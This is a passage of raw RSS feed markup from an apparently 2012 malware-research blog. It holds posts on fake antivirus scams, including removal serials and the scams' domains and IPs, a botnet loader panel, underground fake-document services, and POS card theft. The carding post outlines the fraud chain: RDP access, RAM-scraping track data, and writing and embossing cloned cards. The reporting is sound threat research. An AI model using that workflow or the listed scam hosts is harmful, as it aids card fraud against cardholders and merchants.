src="http://4.bp.blogspot.com/-7wkV3ff6E3o/T1fWhkNW7ZI/AAAAAAAAFaw/jS858_X78lE/s400/unpacking.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Anti&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-jAP4V3r1C34/T1fWq4cL8_I/AAAAAAAAFa4/4iFRddHYWW0/s1600/anti-reverse.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://1.bp.blogspot.com/-jAP4V3r1C34/T1fWq4cL8_I/AAAAAAAAFa4/4iFRddHYWW0/s400/anti-reverse.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Serial&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-HUYLSWYB5Zg/T1flOl8iwfI/AAAAAAAAFbg/jWlzrFI593M/s1600/serial.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://3.bp.blogspot.com/-HUYLSWYB5Zg/T1flOl8iwfI/AAAAAAAAFbg/jWlzrFI593M/s400/serial.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;To register (and help removal), copy paste this code: &lt;b style="color: red;"&gt;LIC-99D0-1239-KJAS-354S-SQD4-CJKF-KF67-GJ78-FGHK-ZDU6&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Kaspersky Lab Technical Support fail by giving a old serial (did they even debugged the FakeAV?)&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-rtLP6EdZe4M/T1fdrayhHYI/AAAAAAAAFbI/c-zCPCIY9XM/s1600/kav_lol.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="http://3.bp.blogspot.com/-rtLP6EdZe4M/T1fdrayhHYI/AAAAAAAAFbI/c-zCPCIY9XM/s400/kav_lol.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;The following urls were found: &lt;br /&gt;&lt;div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"&gt;• dns: 1 » ip: 85.17.58.199 - adresse: PRO-BESTMUSIC.US&lt;br /&gt;http://pro-bestmusic.us/ea.php?p=12&amp;amp;aid=&lt;br /&gt;&lt;br /&gt;• dns: 1 » ip: 85.17.58.199 - adresse: FINELABOZP.IN&lt;br /&gt;http://finelabozp.in/ea.php?p=1&amp;amp;aid=1&lt;br /&gt;&lt;br /&gt;• dns: 1 » ip: 195.226.218.138 - adresse: ANTIVIRUSPROTECTION2012.COM&lt;br /&gt;http://www.antivirusprotection2012.com/buy/index/1/9B11F1579114D8F08FE8069672F71172&lt;br /&gt;&lt;br /&gt;• dns: 1 » ip: 184.22.135.174 - adresse: SAFEBILLINGSERVICE.COM&lt;br /&gt;http://safebillingservice.com/buy/?affiliate_id=1&amp;amp;machine_id=&amp;amp;product_domain=antivirusprotection2012.com &lt;/div&gt;&lt;br /&gt;Thanks to kyREcon :)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5365964245877416061-8568882720096404748?l=www.xylibox.com' alt='' /&gt;&lt;/div&gt;</description><link>http://www.xylibox.com/2012/03/antivirus-protection-2012.html</link><author>noreply@blogger.com (Steven K)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-YVe3mcYAKSU/T1fe6zYsywI/AAAAAAAAFbQ/qUwJE00jZ5A/s72-c/icons.PNG" height="72" width="72" /><thr:total>2</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5365964245877416061.post-8896023842628803558</guid><pubDate>Tue, 06 Mar 2012 22:39:00 +0000</pubDate><atom:updated>2012-03-06T23:45:57.044+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">loader</category><category domain="http://www.blogger.com/atom/ns#">Rev0Lt</category><category domain="http://www.blogger.com/atom/ns#">SKY-Loader</category><category domain="http://www.blogger.com/atom/ns#">SKY-Loader v.1.2</category><title>SKY-Loader v.1.2</title><description>Advert:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-_GmGU6i-nCg/T1aA00YclNI/AAAAAAAAFZ4/dueJJ-uM6GM/s1600/06-03-2012+22-23-20.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://2.bp.blogspot.com/-_GmGU6i-nCg/T1aA00YclNI/AAAAAAAAFZ4/dueJJ-uM6GM/s400/06-03-2012+22-23-20.png" width="338" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-1x_XPnUKdJ8/T1aBSZOTBSI/AAAAAAAAFaA/NT1dH233fNQ/s1600/06-03-2012+22-26-22.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="375" src="http://2.bp.blogspot.com/-1x_XPnUKdJ8/T1aBSZOTBSI/AAAAAAAAFaA/NT1dH233fNQ/s400/06-03-2012+22-26-22.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Fast diagram:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-i8MAWMdPscw/T1aLqzbeD1I/AAAAAAAAFaQ/9eI6Hkj8nik/s1600/revolt.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="397" src="http://2.bp.blogspot.com/-i8MAWMdPscw/T1aLqzbeD1I/AAAAAAAAFaQ/9eI6Hkj8nik/s400/revolt.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;That feel when user/password are the one by default.&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-wYysHjSxJYQ/T1aCIeDafxI/AAAAAAAAFaI/9DDsF03LPyQ/s1600/06-03-2012+22-30-44.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="167" src="http://1.bp.blogspot.com/-wYysHjSxJYQ/T1aCIeDafxI/AAAAAAAAFaI/9DDsF03LPyQ/s400/06-03-2012+22-30-44.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Stats:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-m4AXJJ-xcZ0/T1Z-lGKe-KI/AAAAAAAAFZQ/AOxY8nak_0k/s1600/Stat.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://3.bp.blogspot.com/-m4AXJJ-xcZ0/T1Z-lGKe-KI/AAAAAAAAFZQ/AOxY8nak_0k/s400/Stat.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Add task:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-P3L_tViStdU/T1Z-uja5BBI/AAAAAAAAFZY/icQZXd6t2fM/s1600/add_task.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://1.bp.blogspot.com/-P3L_tViStdU/T1Z-uja5BBI/AAAAAAAAFZY/icQZXd6t2fM/s400/add_task.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Bots info:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-_msb7mOgY6Q/T1Z-1n6mKlI/AAAAAAAAFZg/0guXl-42V3M/s1600/bot_info.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://2.bp.blogspot.com/-_msb7mOgY6Q/T1Z-1n6mKlI/AAAAAAAAFZg/0guXl-42V3M/s400/bot_info.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Settings:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-klyIQDdN1v8/T1Z-8lmQ6RI/AAAAAAAAFZo/Md0OKJ2Ucts/s1600/settings.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://1.bp.blogspot.com/-klyIQDdN1v8/T1Z-8lmQ6RI/AAAAAAAAFZo/Md0OKJ2Ucts/s400/settings.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Help:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-a2wHm7vO0ZU/T1Z_BR5XLuI/AAAAAAAAFZw/VuLP7D9hB-Q/s1600/help.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://1.bp.blogspot.com/-a2wHm7vO0ZU/T1Z_BR5XLuI/AAAAAAAAFZw/VuLP7D9hB-Q/s400/help.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Original malware found in BH EK, Next time don't do DNS Request to the C&amp;amp;C for get a file :þ&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-QA1m_vVZio8/T1aTlaOvXAI/AAAAAAAAFag/HtAAu460Ug0/s1600/06-03-2012+23-44-59.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="77" src="http://3.bp.blogspot.com/-QA1m_vVZio8/T1aTlaOvXAI/AAAAAAAAFag/HtAAu460Ug0/s400/06-03-2012+23-44-59.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-Po9WUAQYbR8/T1aR1g5G_LI/AAAAAAAAFaY/IR3_OdNJEY8/s1600/Black_lagoon_wich_side_are_you_on.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="640" src="http://3.bp.blogspot.com/-Po9WUAQYbR8/T1aR1g5G_LI/AAAAAAAAFaY/IR3_OdNJEY8/s640/Black_lagoon_wich_side_are_you_on.PNG" width="370" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5365964245877416061-8896023842628803558?l=www.xylibox.com' alt='' /&gt;&lt;/div&gt;</description><link>http://www.xylibox.com/2012/03/sky-loader-v12.html</link><author>noreply@blogger.com (Steven K)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-_GmGU6i-nCg/T1aA00YclNI/AAAAAAAAFZ4/dueJJ-uM6GM/s72-c/06-03-2012+22-23-20.png" height="72" width="72" /><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5365964245877416061.post-2230505649964418341</guid><pubDate>Tue, 06 Mar 2012 19:25:00 +0000</pubDate><atom:updated>2012-03-06T20:26:43.301+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">driving license</category><category domain="http://www.blogger.com/atom/ns#">car documents</category><category domain="http://www.blogger.com/atom/ns#">ID Cards</category><category domain="http://www.blogger.com/atom/ns#">fake documents</category><category domain="http://www.blogger.com/atom/ns#">Plastic service</category><category domain="http://www.blogger.com/atom/ns#">passports</category><title>Plastic service and fake documents</title><description>To return a little on my previous post, plastic and fake documents are also a business.&lt;br /&gt;&amp;nbsp;Example with a guys who do plastic service (he even sell embosser/shiner)&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-QuUUzSVAPtQ/T1Y9jAy3WKI/AAAAAAAAFWo/_1mKGexn1Sg/s1600/asthenic.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="191" src="http://4.bp.blogspot.com/-QuUUzSVAPtQ/T1Y9jAy3WKI/AAAAAAAAFWo/_1mKGexn1Sg/s400/asthenic.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Some pictures taken by him:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-5ugJycbCr1s/T1Y93pfTNtI/AAAAAAAAFWw/BzSqsMrWqYM/s1600/img00123201101102219.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://2.bp.blogspot.com/-5ugJycbCr1s/T1Y93pfTNtI/AAAAAAAAFWw/BzSqsMrWqYM/s400/img00123201101102219.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-v1piJBPHoJ4/T1Y99LbdCtI/AAAAAAAAFW4/5ugXxy7-mvA/s1600/img00122201101102219.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://2.bp.blogspot.com/-v1piJBPHoJ4/T1Y99LbdCtI/AAAAAAAAFW4/5ugXxy7-mvA/s400/img00122201101102219.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-pmG57SIGkR8/T1Y-JlniCEI/AAAAAAAAFXA/ANtiF5_jMtk/s1600/img00111201101101639.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://2.bp.blogspot.com/-pmG57SIGkR8/T1Y-JlniCEI/AAAAAAAAFXA/ANtiF5_jMtk/s400/img00111201101101639.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-XObD-BLi6_s/T1Y-O_T_EmI/AAAAAAAAFXI/a9hTRMwGk4Q/s1600/img00102201101101626.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://4.bp.blogspot.com/-XObD-BLi6_s/T1Y-O_T_EmI/AAAAAAAAFXI/a9hTRMwGk4Q/s400/img00102201101101626.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;A service of fake documents with hologram:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-1OkEyOny_L8/T1ZByf3oEMI/AAAAAAAAFXQ/6Xq7MIDI3mM/s1600/faagbaada.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="395" src="http://4.bp.blogspot.com/-1OkEyOny_L8/T1ZByf3oEMI/AAAAAAAAFXQ/6Xq7MIDI3mM/s400/faagbaada.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-QdkQW6d81v0/T1ZCneXD4vI/AAAAAAAAFXY/Vmzv8wxOcX4/s1600/eappmaacp.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://1.bp.blogspot.com/-QdkQW6d81v0/T1ZCneXD4vI/AAAAAAAAFXY/Vmzv8wxOcX4/s400/eappmaacp.jpg" width="370" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Fake passports service by "delfin"&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-1gGKNJN82qI/T1ZMVn47bQI/AAAAAAAAFXo/joOcvtImmMQ/s1600/Fake_passports.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="158" src="http://3.bp.blogspot.com/-1gGKNJN82qI/T1ZMVn47bQI/AAAAAAAAFXo/joOcvtImmMQ/s400/Fake_passports.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Service for various fake documents by vengativ0 (car documents, driving license...)&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-n7orW1txHP0/T1ZUAicrnHI/AAAAAAAAFYA/WWZKohZmI0E/s1600/FakeDocs.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="287" src="http://3.bp.blogspot.com/-n7orW1txHP0/T1ZUAicrnHI/AAAAAAAAFYA/WWZKohZmI0E/s400/FakeDocs.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;span id="goog_753405284"&gt;&lt;/span&gt;&lt;span id="goog_753405285"&gt;&lt;/span&gt;&lt;br /&gt;Fake ID Cards service&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-MbnF90oK0Kg/T1ZNk-IErkI/AAAAAAAAFXw/lvqak9u6t2U/s1600/elite_soldier.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="157" src="http://4.bp.blogspot.com/-MbnF90oK0Kg/T1ZNk-IErkI/AAAAAAAAFXw/lvqak9u6t2U/s400/elite_soldier.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-oYcF44VQwSM/T1ZL5YuIl8I/AAAAAAAAFXg/YS-kLHL1LSA/s1600/elitsoldier_fake_CIF.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="246" src="http://4.bp.blogspot.com/-oYcF44VQwSM/T1ZL5YuIl8I/AAAAAAAAFXg/YS-kLHL1LSA/s400/elitsoldier_fake_CIF.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5365964245877416061-2230505649964418341?l=www.xylibox.com' alt='' /&gt;&lt;/div&gt;</description><link>http://www.xylibox.com/2012/03/plastic-service-and-fake-documents.html</link><author>noreply@blogger.com (Steven K)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-QuUUzSVAPtQ/T1Y9jAy3WKI/AAAAAAAAFWo/_1mKGexn1Sg/s72-c/asthenic.PNG" height="72" width="72" /><thr:total>4</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5365964245877416061.post-4281321969888221866</guid><pubDate>Tue, 06 Mar 2012 19:24:00 +0000</pubDate><atom:updated>2012-03-06T21:11:18.064+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Carding</category><category domain="http://www.blogger.com/atom/ns#">Point Of Sale</category><category domain="http://www.blogger.com/atom/ns#">POS</category><title>POS Carding</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-sxNYTYdPLT0/T1Yp1g7SxuI/AAAAAAAAFWQ/DxSy6edCZO4/s1600/point_of_sale.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="387" src="http://1.bp.blogspot.com/-sxNYTYdPLT0/T1Yp1g7SxuI/AAAAAAAAFWQ/DxSy6edCZO4/s400/point_of_sale.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;I got recently a package of files found in a infected POS (POS hacked due to a weak rdp password)&lt;br /&gt;&lt;br /&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-Af-I4mHYkuc/T1YfzsGya2I/AAAAAAAAFVo/ubGJ3PUqc4s/s1600/iconsz.PNG" /&gt;&lt;br /&gt;&lt;br /&gt;Interface of a compromised POS used by a jeweller:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-CpY9LvCk6Yc/T1YzSlXyZ2I/AAAAAAAAFWY/a5EV-e05sJ8/s1600/POS.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="252" src="http://2.bp.blogspot.com/-CpY9LvCk6Yc/T1YzSlXyZ2I/AAAAAAAAFWY/a5EV-e05sJ8/s400/POS.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;out.exe is a Ardamax Keylogger (ardamax.com) and vui qua.exe is a SFX archive who display this picture when executed:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-O2Yj7ZxM808/T1YiQ5EH5KI/AAAAAAAAFVw/3ck_Z0EnfDI/s1600/45266344-vui-1-a.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://2.bp.blogspot.com/-O2Yj7ZxM808/T1YiQ5EH5KI/AAAAAAAAFVw/3ck_Z0EnfDI/s400/45266344-vui-1-a.jpg" width="285" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;And drop Pefect Keylogger (blazingtools.com) behind.&lt;br /&gt;"vui qua" might be a Vietnamese phrase which translated is "so funny".&lt;br /&gt;&lt;br /&gt;These two keyloggers are probably useless for the carder, the interesting file here is "mmon.exe" a ram scraper.&lt;br /&gt;It scan each and every  process looking for CC dumps thats been written to memory Track 1, 2.&lt;br /&gt;If a Point Of Sale device is connected to the computer it will grab it's  card data right away.&lt;br /&gt;How? POS always use end to end encryption, the only place where it's not encrypted are inside the memory.&lt;br /&gt;But.. the memory have limited storage so it overwrites the data all the time.&lt;br /&gt;It's also a problem for mmon, because this crap have no loop feature and does not write inside a file.&lt;br /&gt;POS Carders usually use better malware than this, but i got this so...&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-JbKOtJXoDa4/T1YkM0gVyRI/AAAAAAAAFV4/KFBFAhs8Wjo/s1600/MMON.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="235" src="http://4.bp.blogspot.com/-JbKOtJXoDa4/T1YkM0gVyRI/AAAAAAAAFV4/KFBFAhs8Wjo/s400/MMON.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;(mmon.exe, "Kartoxa" is probably the distorted version of the word "potato")&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-N9QanAUs7u4/T1Y6rETFkdI/AAAAAAAAFWg/7nuumqp9mUc/s1600/Scan_of_running_process.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://1.bp.blogspot.com/-N9QanAUs7u4/T1Y6rETFkdI/AAAAAAAAFWg/7nuumqp9mUc/s400/Scan_of_running_process.PNG" width="191" /&gt;&lt;/a&gt;&lt;/div&gt;mmon scanning process.&lt;br /&gt;&lt;br /&gt;test of mmon with a valid track two in memory&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-VVRuxWvpydQ/T1ZvU5T3z-I/AAAAAAAAFYw/TOX0UEzkMhA/s1600/Valid_track_two_test.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="257" src="http://3.bp.blogspot.com/-VVRuxWvpydQ/T1ZvU5T3z-I/AAAAAAAAFYw/TOX0UEzkMhA/s400/Valid_track_two_test.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;When a dump is found, the program do nothing with it, it just display the stuff on console.&lt;br /&gt;The bad guys just connect to the POS via RDP, get dumps via mmon and write them out on magnetic stripe with a card writer.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-ellW5sdKUeE/T1Ylx4QQwSI/AAAAAAAAFWA/HgvR2aamfLg/s1600/Magnetic-Card-Reader-and-Writer-Hico-3-Tracks-With-USB-Interface.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://2.bp.blogspot.com/-ellW5sdKUeE/T1Ylx4QQwSI/AAAAAAAAFWA/HgvR2aamfLg/s400/Magnetic-Card-Reader-and-Writer-Hico-3-Tracks-With-USB-Interface.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&amp;nbsp;(MSR606 USB Magnetic Stripe Reader Writer/Encoder)&lt;br /&gt;&lt;br /&gt;Then use an embosser to make imprinted numbers on the card.&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-Au6JTUBDDic/T1YnPBMLO8I/AAAAAAAAFWI/4o1fEUib9Dg/s1600/embosser.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="367" src="http://1.bp.blogspot.com/-Au6JTUBDDic/T1YnPBMLO8I/AAAAAAAAFWI/4o1fEUib9Dg/s400/embosser.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;(A DXR 70C embosser)&lt;br /&gt;&lt;br /&gt;And it's ready to use... in USA (Type 101)&lt;br /&gt;The ones we have in Europe are 201 cards (pin and chip)&lt;br /&gt;101 only need to swipes the card in a store and the cashier checks the 4 last digits on the card if they are corect.&lt;br /&gt;Carders also use printers like Fargo to make fake identities.&lt;br /&gt;Anyway, a POS malware have a high price, it's not a business that everyone can do.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5365964245877416061-4281321969888221866?l=www.xylibox.com' alt='' /&gt;&lt;/div&gt;</description><link>http://www.xylibox.com/2012/03/pos-carding.html</link><author>noreply@blogger.com (Steven K)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-sxNYTYdPLT0/T1Yp1g7SxuI/AAAAAAAAFWQ/DxSy6edCZO4/s72-c/point_of_sale.jpg" height="72" width="72" /><thr:total>5</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5365964245877416061.post-7437171989227520853</guid><pubDate>Tue, 06 Mar 2012 19:20:00 +0000</pubDate><atom:updated>2012-03-06T20:20:07.395+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">fakeav</category><category domain="http://www.blogger.com/atom/ns#">Antimalware PC Safety</category><title>Antimalware PC Safety</title><description>&lt;img border="0" src="http://1.bp.blogspot.com/-ZmE6WGiNCxo/T1ZPdMA6HkI/AAAAAAAAFX4/x2TuLO8GupQ/s1600/iconnz.PNG" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Antimalware PC Safety&lt;/b&gt; is a fake Antivirus. This rogue displays fake alerts to scare users.&lt;br /&gt;It replaces &lt;b&gt;AV Security Essentials&lt;/b&gt;, &lt;b&gt;Smart Anti-Malware Protection&lt;/b&gt;, &lt;b&gt;Antivirus Smart Protection&lt;/b&gt;, &lt;b&gt;Malware Protection Center&lt;/b&gt;, &lt;b&gt;Internet Security Guard&lt;/b&gt;, &lt;b&gt;Home Security Solutions&lt;/b&gt;, &lt;b&gt;Home Safety Essentials&lt;/b&gt;, &lt;b&gt;Anti-Malware Lab&lt;/b&gt;, &lt;b&gt;System Smart Security&lt;/b&gt;, &lt;b&gt;PC Security Guardian&lt;/b&gt;, &lt;b&gt;Best Malware Protection&lt;/b&gt;, &lt;b&gt;Internet Security Essentials&lt;/b&gt;, &lt;b&gt;Smart Internet Protection 2011&lt;/b&gt;, P&lt;b&gt;ersonal Internet Security 2011&lt;/b&gt;, &lt;b&gt;Personal Security Sentinel&lt;/b&gt;, &lt;b&gt;Internet Antivirus 2011&lt;/b&gt;, &lt;b&gt;Internet Security Suite&lt;/b&gt;, &lt;b&gt;Smart Security&lt;/b&gt;, &lt;b&gt;My Security Shield&lt;/b&gt;, &lt;b&gt;Security Master AV&lt;/b&gt;, &lt;b&gt;My Security Engine&lt;/b&gt;, &lt;b&gt;Security Guard&lt;/b&gt;, &lt;b&gt;CleanUp Antivirus&lt;/b&gt; and &lt;b&gt;Security Antivirus&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-u49p5hQihQw/T1ZhrdAxHrI/AAAAAAAAFYI/BfVQA4PfdVI/s1600/Antimalware.PC.Safety.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="288" src="http://2.bp.blogspot.com/-u49p5hQihQw/T1ZhrdAxHrI/AAAAAAAAFYI/BfVQA4PfdVI/s400/Antimalware.PC.Safety.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;To register (and help removal), enter this serial code: &lt;b style="color: red;"&gt;P1QM-XG6B-TVAZ-DC4W&lt;/b&gt; or &lt;b style="color: red;"&gt;U2FD-S2LA-H4KA-UEPB&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-T7PTkCw5Z50/T1ZiXyJs9SI/AAAAAAAAFYo/dx5S3ylMA9g/s1600/dumpedunpack.PNG" 